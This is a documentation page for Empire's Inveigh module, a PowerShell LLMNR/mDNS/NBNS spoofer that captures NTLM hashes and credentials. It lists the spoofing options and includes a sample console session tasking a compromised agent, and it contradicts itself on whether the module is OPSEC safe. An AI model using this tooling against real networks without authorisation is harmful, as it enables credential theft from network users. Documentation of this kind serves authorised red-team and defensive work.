Invoke-Inveigh - Empire Module
This page contains detailed information about how to use the powershell/collection/inveigh Empire module. For list of all Empire modules, visit the Empire Module Library.
Module Overview
Name: Invoke-Inveigh
Module: powershell/collection/inveigh
Source code [1]: empire/server/modules/powershell/collection/inveigh.yaml
Source code [2]: empire/server/data/module_source/collection/Invoke-Inveigh.ps1
MITRE ATT&CK:
T1171
Language: PowerShell
Needs admin: No
OPSEC safe: Yes
Background: Yes
Inveigh is a Windows PowerShell LLMNR/mDNS/NBNS spoofer/man-in-the-middle tool. Note that this module exposes only a subset of Inveigh's parameters. Inveigh can be used through Empire's scriptimport and scriptcmd if additional parameters are needed.
This module runs in a foreground and is OPSEC unsafe as it writes on the disk and therefore could be detected by AV/EDR running on the target system.
Note that the inveigh module does not need administrative privileges to work properly which means that a normal user can run this module.
Required Module Options
This is a list of options that are required by the inveigh module:
Agent
Agent to run module on.
RunTime
Run time duration in minutes.
Additional Module Options
This is a list of additional options that are supported by the inveigh module:
ConsoleOutput
(Low/Medium/Y) Default = Y: Enable/Disable real time console output. Medium and Low can be used to reduce output.
ConsoleStatus
Interval in minutes for displaying all unique captured hashes and credentials. This will display a clean list of captures in Empire.
ConsoleUnique
(Y/N) Default = Y: Enable/Disable displaying challenge/response hashes for only unique IP, domain/hostname, and username combinations.
ElevatedPrivilege
(Auto/Y/N) Default = Auto: Set the privilege mode. Auto will determine if Inveigh is running with elevated privilege. If so, options that require elevated privilege can be used.
HTTP
(Y/N) Default = Y: Enable/Disable HTTP challenge/response capture.
HTTPAuth
(Anonymous/Basic/NTLM/NTLMNoESS) HTTP listener authentication type. This setting does not apply to wpad.dat requests.
HTTPContentType
Content type for HTTP/Proxy responses. Does not apply to EXEs and wpad.dat. Set to "application/hta" for HTA files or when using HTA code with HTTPResponse.
HTTPResponse
Content to serve as the default HTTP/Proxy response. This response will not be used for wpad.dat requests. Use PowerShell escape characters and newlines where necessary. This paramater will be wrapped in double quotes by this module.
IP
Local IP address for listening and packet sniffing. This IP address will also be used for LLMNR/mDNS/NBNS spoofing if the SpooferIP parameter is not set.
Inspect
(Switch) Inspect LLMNR, mDNS, and NBNS traffic only.
LLMNR
(Y/N) Default = Y: Enable/Disable LLMNR spoofer.
NBNS
(Y/N) Enable/Disable NBNS spoofer.
NBNSTypes
Default = 00,20: Comma separated list of NBNS types to spoof.
Proxy
(Y/N) Enable/Disable Inveigh's proxy server authentication capture.
ProxyPort
Default = 8492: TCP port for the Inveigh's proxy listener.
RunCount
Number of NTLMv1/NTLMv2 captures to perform before auto-exiting.
SMB
(Y/N) Default = Y: Enable/Disable SMB challenge/response capture.
SpooferHostsIgnore
Comma separated list of requested hostnames to ignore when spoofing.
SpooferHostsReply
Comma separated list of requested hostnames to respond to when spoofing.
SpooferIP
Response IP address for spoofing. This parameter is only necessary when redirecting victims to a system other than the Inveigh host.
SpooferIPsIgnore
Comma separated list of source IP addresses to ignore when spoofing.
SpooferIPsReply
Comma separated list of source IP addresses to respond to when spoofing.
SpooferLearning
(Y/N) Enable/Disable LLMNR/NBNS valid host learning.
SpooferLearningDelay
Time in minutes that Inveigh will delay spoofing while valid hosts are being blacklisted through SpooferLearning.
SpooferRepeat
(Y/N) Default = Y: Enable/Disable repeated LLMNR/NBNS spoofs to a victim system after one user challenge/response has been captured.
WPADAuth
(Anonymous/Basic/NTLM/NTLMNoESS) HTTP listener authentication type for wpad.dat requests.
mDNS
(Y/N) Enable/Disable mDNS spoofer.
mDNSTypes
(QU,QM) Default = QU: Comma separated list of mDNS types to spoof. Note that QM will send the response to 224.0.0.251.
Inveigh Example Usage
Here's an example of how to use the inveigh module in the Empire client console:
[+] New agent Y4LHEV83 checked in
[*] Sending agent (stage 2) to Y4LHEV83 at 192.168.204.135
(empire usestager/windows/ducky) > usemodule powershell/collection/inveigh
Author Kevin Robertson
Background True
Comments https://github.com/Kevin-Robertson/Inveigh
Description Inveigh is a Windows PowerShell LLMNR/mDNS/NBNS spoofer/man-in-the-
middle tool. Note that this module exposes only a subset of Inveigh's
parameters. Inveigh can be used through Empire's scriptimport and
scriptcmd if additional parameters are needed.
Language powershell
Name powershell/collection/inveigh
NeedsAdmin False
OpsecSafe True
Techniques http://attack.mitre.org/techniques/T1171
,Record Options--------,-------,----------,-------------------------------------,
| Name | Value | Required | Description |
|----------------------|-------|----------|-------------------------------------|
| Agent | | True | Agent to run module on. |
|----------------------|-------|----------|-------------------------------------|
| ConsoleOutput | | False | (Low/Medium/Y) Default = Y: |
| | | | Enable/Disable real time console |
| | | | output. Medium and Low can be used |
| | | | to reduce output. |
|----------------------|-------|----------|-------------------------------------|
| ConsoleStatus | | False | Interval in minutes for displaying |
| | | | all unique captured hashes and |
| | | | credentials. This will display a |
| | | | clean list of captures in Empire. |
|----------------------|-------|----------|-------------------------------------|
| ConsoleUnique | | False | (Y/N) Default = Y: Enable/Disable |
| | | | displaying challenge/response |
| | | | hashes for only unique IP, |
| | | | domain/hostname, and username |
| | | | combinations. |
|----------------------|-------|----------|-------------------------------------|
| ElevatedPrivilege | | False | (Auto/Y/N) Default = Auto: Set the |
| | | | privilege mode. Auto will determine |
| | | | if Inveigh is running with elevated |
| | | | privilege. If so, options that |
| | | | require elevated privilege can be |
| | | | used. |
|----------------------|-------|----------|-------------------------------------|
| HTTP | | False | (Y/N) Default = Y: Enable/Disable |
| | | | HTTP challenge/response capture. |
|----------------------|-------|----------|-------------------------------------|
| HTTPAuth | | False | (Anonymous/Basic/NTLM/NTLMNoESS) |
| | | | HTTP listener authentication type. |
| | | | This setting does not apply to |
| | | | wpad.dat requests. |
|----------------------|-------|----------|-------------------------------------|
| HTTPContentType | | False | Content type for HTTP/Proxy |
| | | | responses. Does not apply to EXEs |
| | | | and wpad.dat. Set to |
| | | | "application/hta" for HTA files or |
| | | | when using HTA code with |
| | | | HTTPResponse. |
|----------------------|-------|----------|-------------------------------------|
| HTTPResponse | | False | Content to serve as the default |
| | | | HTTP/Proxy response. This response |
| | | | will not be used for wpad.dat |
| | | | requests. Use PowerShell escape |
| | | | characters and newlines where |
| | | | necessary. This paramater will be |
| | | | wrapped in double quotes by this |
| | | | module. |
|----------------------|-------|----------|-------------------------------------|
| IP | | False | Local IP address for listening and |
| | | | packet sniffing. This IP address |
| | | | will also be used for |
| | | | LLMNR/mDNS/NBNS spoofing if the |
| | | | SpooferIP parameter is not set. |
|----------------------|-------|----------|-------------------------------------|
| Inspect | | False | (Switch) Inspect LLMNR, mDNS, and |
| | | | NBNS traffic only. |
|----------------------|-------|----------|-------------------------------------|
| LLMNR | | False | (Y/N) Default = Y: Enable/Disable |
| | | | LLMNR spoofer. |
|----------------------|-------|----------|-------------------------------------|
| NBNS | | False | (Y/N) Enable/Disable NBNS spoofer. |
|----------------------|-------|----------|-------------------------------------|
| NBNSTypes | | False | Default = 00,20: Comma separated |
| | | | list of NBNS types to spoof. |
|----------------------|-------|----------|-------------------------------------|
| Proxy | | False | (Y/N) Enable/Disable Inveigh's |
| | | | proxy server authentication |
| | | | capture. |
|----------------------|-------|----------|-------------------------------------|
| ProxyPort | | False | Default = 8492: TCP port for the |
| | | | Inveigh's proxy listener. |
|----------------------|-------|----------|-------------------------------------|
| RunCount | | False | Number of NTLMv1/NTLMv2 captures to |
| | | | perform before auto-exiting. |
|----------------------|-------|----------|-------------------------------------|
| RunTime | | True | Run time duration in minutes. |
|----------------------|-------|----------|-------------------------------------|
| SMB | | False | (Y/N) Default = Y: Enable/Disable |
| | | | SMB challenge/response capture. |
|----------------------|-------|----------|-------------------------------------|
| SpooferHostsIgnore | | False | Comma separated list of requested |
| | | | hostnames to ignore when spoofing. |
|----------------------|-------|----------|-------------------------------------|
| SpooferHostsReply | | False | Comma separated list of requested |
| | | | hostnames to respond to when |
| | | | spoofing. |
|----------------------|-------|----------|-------------------------------------|
| SpooferIP | | False | Response IP address for spoofing. |
| | | | This parameter is only necessary |
| | | | when redirecting victims to a |
| | | | system other than the Inveigh host. |
|----------------------|-------|----------|-------------------------------------|
| SpooferIPsIgnore | | False | Comma separated list of source IP |
| | | | addresses to ignore when spoofing. |
|----------------------|-------|----------|-------------------------------------|
| SpooferIPsReply | | False | Comma separated list of source IP |
| | | | addresses to respond to when |
| | | | spoofing. |
|----------------------|-------|----------|-------------------------------------|
| SpooferLearning | | False | (Y/N) Enable/Disable LLMNR/NBNS |
| | | | valid host learning. |
|----------------------|-------|----------|-------------------------------------|
| SpooferLearningDelay | | False | Time in minutes that Inveigh will |
| | | | delay spoofing while valid hosts |
| | | | are being blacklisted through |
| | | | SpooferLearning. |
|----------------------|-------|----------|-------------------------------------|
| SpooferRepeat | | False | (Y/N) Default = Y: Enable/Disable |
| | | | repeated LLMNR/NBNS spoofs to a |
| | | | victim system after one user |
| | | | challenge/response has been |
| | | | captured. |
|----------------------|-------|----------|-------------------------------------|
| WPADAuth | | False | (Anonymous/Basic/NTLM/NTLMNoESS) |
| | | | HTTP listener authentication type |
| | | | for wpad.dat requests. |
|----------------------|-------|----------|-------------------------------------|
| mDNS | | False | (Y/N) Enable/Disable mDNS spoofer. |
|----------------------|-------|----------|-------------------------------------|
| mDNSTypes | | False | (QU,QM) Default = QU: Comma |
| | | | separated list of mDNS types to |
| | | | spoof. Note that QM will send the |
| | | | response to 224.0.0.251. |
'----------------------'-------'----------'-------------------------------------'
(Empire: usemodule/powershell/collection/inveigh) > set Agent Y4LHEV83
[*] Set Agent to Y4LHEV83
(Empire: usemodule/powershell/collection/inveigh) > set RunTime value
[*] Set RunTime to value
(Empire: usemodule/powershell/collection/inveigh) > execute
[*] Tasked Y4LHEV83 to run Task 1
...
Now wait for the results to come.
Author
- Kevin Robertson
References
- https://github.com/BC-SECURITY/Empire/tree/master/empire/server/modules/powershell/collection/inveigh.yaml
- https://github.com/BC-SECURITY/Empire/tree/master/empire/server/data/module_source/collection/Invoke-Inveigh.ps1
- https://github.com/Kevin-Robertson/Inveigh
- http://attack.mitre.org/techniques/T1171
- https://duckduckgo.com/
- https://github.com/subTee/Interceptor
See Also
Check also the following modules related to this module:
- powershell/lateral_movement/inveigh_relay
- powershell/collection/get_sql_query
- powershell/collection/SharpLoginPrompt
- powershell/collection/file_finder
- powershell/collection/get_indexed_item
- powershell/collection/ninjacopy
- powershell/collection/clipboard_monitor
- powershell/collection/FoxDump
- powershell/collection/prompt
- powershell/collection/minidump
- powershell/collection/netripper
- powershell/collection/SauronEye
- powershell/collection/toasted
- powershell/collection/screenshot
- powershell/collection/find_interesting_file
- powershell/collection/browser_data
- powershell/collection/WireTap
- powershell/collection/WebcamRecorder
- powershell/collection/ChromeDump
- powershell/collection/USBKeylogger
- powershell/collection/get_sql_column_sample_data
- powershell/collection/keylogger
- powershell/collection/get-winupdates
- powershell/collection/packet_capture
- powershell/collection/SharpChromium
- powershell/collection/vaults/remove_keepass_config_trigger
- powershell/collection/vaults/add_keepass_config_trigger
- powershell/collection/vaults/keethief
- powershell/collection/vaults/find_keepass_config
- powershell/collection/vaults/get_keepass_config_trigger
Version
This page has been created based on Empire version 4.1.3 (BC Security Fork).
Visit Empire Module Library for more modules.
